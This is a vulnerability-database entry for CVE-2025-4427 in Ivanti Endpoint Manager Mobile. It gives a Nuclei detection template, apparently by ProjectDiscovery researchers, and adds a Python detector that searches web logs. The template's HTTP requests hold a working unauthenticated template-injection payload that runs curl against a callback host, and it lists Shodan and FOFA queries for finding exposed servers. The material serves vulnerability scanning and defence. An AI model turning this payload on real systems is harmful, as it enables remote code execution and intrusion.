Ivanti Endpoint Manager Mobile - Unauthenticated Remote Code Execution
CVE-2025-4427
Verified
Description
An authentication bypass in Ivanti Endpoint Manager Mobile allows attackers to access protected resources without proper credentials. This leads to unauthenticated Remote Code Execution via unsafe user input in one of the bean validators, which is a sink for Server-Side Template Injection.
Severity
Critical
CVSS Score
5.3
Exploit Probability
1%
Affected Product
endpoint_manager_mobile
Published Date
May 15, 2025
Template Author
iamnoooob, rootxharsh, parthmalhotra, pdresearch
CVE-2025-4427.yaml
id: CVE-2025-4427

info:
  name: Ivanti Endpoint Manager Mobile - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    An authentication bypass in Ivanti Endpoint Manager Mobile allowing attackers to access protected resources without proper credentials. This leads to unauthenticated Remote Code Execution via unsafe userinput in one of the bean validators which is sink for Server-Side Template Injection.
  reference:
    - https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-4427
    cwe-id: CWE-288
    epss-score: 0.00942
    epss-percentile: 0.75063
  metadata:
    verified: true
    max-request: 2
    vendor: ivanti
    product: endpoint_manager_mobile
    shodan-query: http.favicon.hash:"362091310"
    fofa-query: icon_hash="362091310"
  tags: cve,cve2025,ivanti,epmm,rce,ssti,kev

http:
  - raw:
      - |
        GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20{{interactsh-url}}')%7d HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Format 'Process[pid="
          - "localizedMessage"
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: status
        status:
          - 400
# digest: 4b0a00483046022100c06c67c67d53a450303fbac63bd2d4af96c826c5df4df276f716d96b49be1831022100a60fe8adb99d5197d9fc143d39d30337df5de132e2f190e72bf33c36637e5714:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2025-4427
CWE ID:
cwe-288
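
Detection example (added here, not part of the template or of Ivanti's tooling): the template's requests put a ${...} expression in the format query parameter of /api/v2/featureusage and /api/v2/featureusage_history, so a defender can search web access logs for that request shape. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The two endpoints requested by the template.
ENDPOINTS = {"/api/v2/featureusage", "/api/v2/featureusage_history"}
# Request part of a combined-format log line (assumed format): "METHOD target HTTP/x.y" status
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def inspect_line(line):
    """Return a finding if the line hits a template endpoint with ${ in 'format', else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.rstrip("/") not in ENDPOINTS:
        return None
    # parse_qs percent-decodes values, so %24%7b and a literal ${ are treated alike.
    values = parse_qs(parts.query, keep_blank_values=True).get("format", [])
    hits = [v for v in values if "${" in v]
    if not hits:
        return None
    status = int(m.group("status"))
    return {
        "client": line.split(" ", 1)[0],
        "path": parts.path,
        "format": hits[0],
        "status": status,
        # The template's status matcher expects HTTP 400.
        "matches_template_status": status == 400,
    }

def scan(lines):
    """Inspect every log line and return the findings in input order."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges, placeholder expression).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/May/2025:10:00:01 +0000] "GET /api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7bCONSTRUCTED%7d HTTP/1.1" 400 512',
    '192.0.2.11 - - [16/May/2025:10:00:02 +0000] "GET /api/v2/featureusage_history?adminDeviceSpaceId=131&format=csv HTTP/1.1" 401 0',
    '198.51.100.7 - - [16/May/2025:10:00:03 +0000] "GET /api/v2/featureusage_history?format=${CONSTRUCTED} HTTP/1.1" 500 498',
    '192.0.2.12 - - [16/May/2025:10:00:04 +0000] "GET /index.html?format=%24%7bx%7d HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
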